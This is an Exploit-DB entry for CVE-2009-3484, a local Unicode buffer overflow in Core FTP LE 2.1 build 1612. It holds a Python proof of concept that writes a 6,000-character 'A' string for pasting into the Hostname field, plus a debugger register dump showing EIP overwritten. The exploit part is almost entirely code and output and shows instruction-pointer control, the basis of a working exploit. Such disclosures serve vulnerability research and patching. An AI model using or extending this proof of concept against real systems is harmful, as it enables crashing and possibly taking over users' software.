Core FTP LE 2.1 build 1612 - Local Buffer Overflow PoC

2009-09-25T00:00:00
ID EDB-ID:9815
Type exploitdb
Reporter Dr_IDE
Modified 2009-09-25T00:00:00

Description

Core FTP LE 2.1 build 1612 local buffer overflow PoC. CVE-2009-3484. Remote exploit for windows platform

                                        
                                            #!/usr/bin/env python

####################################################################################
#
# Core FTP LE v2.1 build 1612 Local Buffer Overflow PoC (Unicode)
# Found By:	Dr_IDE
# Tested On:	XPSP3, 7RC
# Notes:	Most likely other versions are vulnerable too.
# Usage:	File, Quick Connect, Paste into Hostname, Connect
#
####################################################################################

# Register Dump on XPSP3
"""
EAX 00000064
ECX 00410041 coreftp.00410041
EDX 0054F840 coreftp.0054F840
EBX 026E2FFC
ESP 0321E958 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 00410041 coreftp.00410041
ESI 0269CC30
EDI 04BB6A58 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EIP 00410041 coreftp.00410041
C 0  ES 002B 32bit 0(FFFFFFFF)
P 0  CS 0023 32bit 0(FFFFFFFF)
A 0  SS 002B 32bit 0(FFFFFFFF)
Z 0  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFD7000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr WSAHOST_NOT_FOUND (00002AF9)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.0
ST7 empty 0.0
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
"""

# After Passing Exception on XPSP3
# EIP 00410041 coreftp.00410041

buff = ("\x41" * 6000)

f1 = open("coreftple.txt","w")
f1.write(buff)
f1.close()